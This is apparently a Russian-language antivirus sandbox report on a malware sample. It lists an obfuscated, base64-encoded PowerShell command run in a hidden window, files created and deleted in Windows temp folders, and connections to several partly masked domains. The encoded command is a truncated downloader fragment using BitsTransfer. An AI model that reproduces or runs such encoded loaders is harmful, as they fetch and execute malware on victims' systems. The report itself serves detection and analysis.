Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cab1531.tmp
- %WINDIR%\temp\tar1532.tmp
- %WINDIR%\temp\cab1561.tmp
- %WINDIR%\temp\tar1562.tmp
- %WINDIR%\temp\cab1573.tmp
- %WINDIR%\temp\tar1574.tmp
- %WINDIR%\temp\cab2b7e.tmp
- %WINDIR%\temp\tar2b7f.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Удаляет следующие файлы
- %WINDIR%\temp\cab1531.tmp
- %WINDIR%\temp\tar1532.tmp
- %WINDIR%\temp\cab1561.tmp
- %WINDIR%\temp\tar1562.tmp
- %WINDIR%\temp\cab1573.tmp
- %WINDIR%\temp\tar1574.tmp
- %WINDIR%\temp\cab2b7e.tmp
- %WINDIR%\temp\tar2b7f.tmp
Сетевая активность
Подключается к
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'p3###########.shr.prod.phx3.secureserver.net':80
- 'st####g.icuskin.com':80
TCP
- 'ra####kaonline.com':443
UDP
- DNS ASK ra####kaonline.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK p3###########.shr.prod.phx3.secureserver.net
- DNS ASK st####g.icuskin.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)
